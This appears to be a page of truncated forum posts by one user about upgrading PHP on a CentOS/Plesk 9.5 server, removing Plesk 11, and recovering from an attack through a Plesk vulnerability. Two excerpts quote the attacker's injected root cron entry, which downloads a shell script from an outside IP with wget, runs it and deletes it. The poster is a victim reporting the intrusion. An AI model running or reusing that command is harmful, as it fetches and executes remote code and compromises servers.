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Thanks, how should I upgrade php after installing that? I guess it's a matter of yum-updating php, but maybe I have to be careful not forgetting to update some other package too?
If something goes wrong, will I be able to revert the changes easily?
Nope. That's about upgrading php 5.3 provided that you already have 5.3 installed. At least that's what it says.
I'm talking about upgrading TO php 5.3, that is, uninstalling 5.1 and installing 5.3 or 5.4 (since upgrading isn't possible).
I have CentOS 5.9 with Plesk 9.5 and it has PHP 5.1
Now php 5.1 can't be simply upgraded to 5.3 with yum update because php starting from 5.3 is a different package, "php53" (while php 5.1 is just "php").
But I can't install the package php53 without uninstalling php 5.1 because they...
There MUST be some tool provided by Parallels to fix the damages made by this attack. I have seen posts by people affected by the exact same attack, so I guess it's been pretty common, and after all this is due to a security vulnerability in Plesk....
Hi,
I have received an attack that probably exploited the vulnerability described in:
http://kb.parallels.com/en/113321
Someone or something was able to inject a cronjob into my server which ran:
Cron <root@ks3094309> cd /tmp;wget...
Turns out the password had been reset to "tascam" (a value I certainly never set).
(I found out by looking at /etc/psa/.psa.shadow
So I logged in, changed the password, and tried to submit a support ticket.
But I'm told you have exceeded the support period and have to pay to get support...
I got this email with the output of of some cronjob executing some of Plesk's broken scripts, and it's full of errors:
Cron <root@ks3094309> cd /tmp;wget http://128.173.237.127:8080/browser/browser/backup1.sh;chmod x backup1.sh;sh /tmp/backup1.sh;rm -Rf /tmp/backup1.sh;chattr -ASacdijsu...
Hi,
I have Plesk 9.5 with only one domain.
From the Home page, I go to "Scheduled Task". Then, I am obliged to select a system user for which to manage the scheduled tasks.
I want to see all existing cronjobs, and there are like 57 system users. Going through them one by one to examine...
I had Plesk 11 preinstalled on a freshly-installed Cent-OS 6 server from OVH.
When removing it with yum remove, there was a php "fatal error" message. The uninstallation seems to have succeeded, but this needs to be fixed anyway.
See below (search for "fatal"):